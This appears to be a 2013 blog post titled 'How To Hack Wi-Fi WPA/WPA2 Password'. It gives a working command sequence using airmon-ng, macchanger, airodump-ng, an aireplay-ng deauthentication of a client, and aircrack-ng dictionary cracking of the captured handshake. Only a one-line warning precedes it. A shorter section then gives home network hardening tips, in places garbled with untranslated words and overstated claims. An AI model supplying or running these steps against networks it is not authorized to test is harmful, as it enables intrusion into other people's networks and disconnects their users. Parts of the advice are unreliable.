Tuesday, 19 November 2013

How To Hack Wi-Fi WPA/WPA2 Password & Secure your Wi-Fi

 Warning:::::::Don't hack any  authorized wifi otherwise you go to jail.

Hack Wifi

 Tools

  • Compatible Wifi Card (Optional) 

Rules to follow 

1.Now you First install a Vmware   in your system.
2. Then you create a virtual machine in your Vmware.



3.Then power on your machine.
4.And  Now your all set to go...just simply follow below steps...now




Steps to Follow 

    •  airmon-ng

    The result will be something like :


    Interface    Chipset      Driver
    wlan0        Intel 5100   iwlagn - [phy0]
     

    • airmon-ng start wlan0 

    •  (Optional) Change the mac address of the mon0 interface.

    • ifconfig mon0 down

      macchanger -m 00:11:22:33:44:55 mon0
      ifconfig mon0 up

       

    • airodump-ng mon0

      Then, press "
      Ctrl+c" to break the program.
    •  airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

    *where -c is the channel
               -w is the file to be written
               --bssid is the BSSID
    This terminal is keeping running.open another terminal.


    • aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

      *where -a is the BSSID
                 -c is the client MAC address (STATION)
      Wait for the handshake 
      Use the John the Ripper as word list to crack the WPA/WP2 password                              aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
    • You can  use your own password wordlist.  

       Secure your wifi  

      1.  Choice encrypt

      A simple matter . WEP can be cracked in a few minutes, and WPA is relatively weaker than WPA2 . Choose WPA2 .
      No WEP, not WPA . End of story .
      WPA2 networks can only attack dictionary attacks , so ...

      2.  Setting a strong password

      WPA2 forces us to use at least 8 character password , which in itself is good , but each character increases security exponentially , that is, with each a pool of all possible to generate passwords of this length greatly increases. So it really makes a difference whether you use a password of 8 or a 9 characters.

      3. Change the default network name ( SSID)

      You have to remember to never leave the default network name , such as " Netgear " and " Asus " . Attackers often carry with them so . rainbow tables , so that breaking WPA/WPA2 password for the network with the same name takes just a few minutes. ( This is explained in detail in the operation of WPA/WPA2 )
      If a list of the vein , or as the SSID you set a random string of characters (not recommended ) , crackers utrudnicie life.
      4. Change the password to the router

      Suppose that someone has hacked into your network. Most at 192.168.1.1 ( or similar ) is the router control panel where you can do anything : change the password for your network , change the name , disable it , and more.
      Very often, the router itself is protected by a username and password (admin , admin ) , which is not a big obstacle for burglars . Also keep in mind to change the defaults wherever possible.

      5. Limiting coverage

      Most WiFi intrusions followed by " outsiders" . The neighborhood wireless network card detects a lot of potential victims , most of the apartments around us or from nearby buildings.
      WiFi network coverage should be chosen so as to cover the whole house , but nothing else. This will prevent any unwanted shares . Frequently in the options you can set the router transmitter power .

      6. Filtering MAC / hide the SSID

      All the networks are saying not to use the above . techniques , as they are very easy to break. It is of course true, but ... why not hinder life crackers ? :)
      By the way, when we go on vacation and forget to turn off the router and the network is empty there in the ether , hiding the SSID and MAC address filtering is a not - for - workaround. We can not podszpiegowac who logs on to the network and change your MAC address on him, because no one logs on to the network. Likewise, we can not use the attack revoke credentials to check a hidden network name , because it is who perform the attack .

       



No comments:

Post a Comment

Search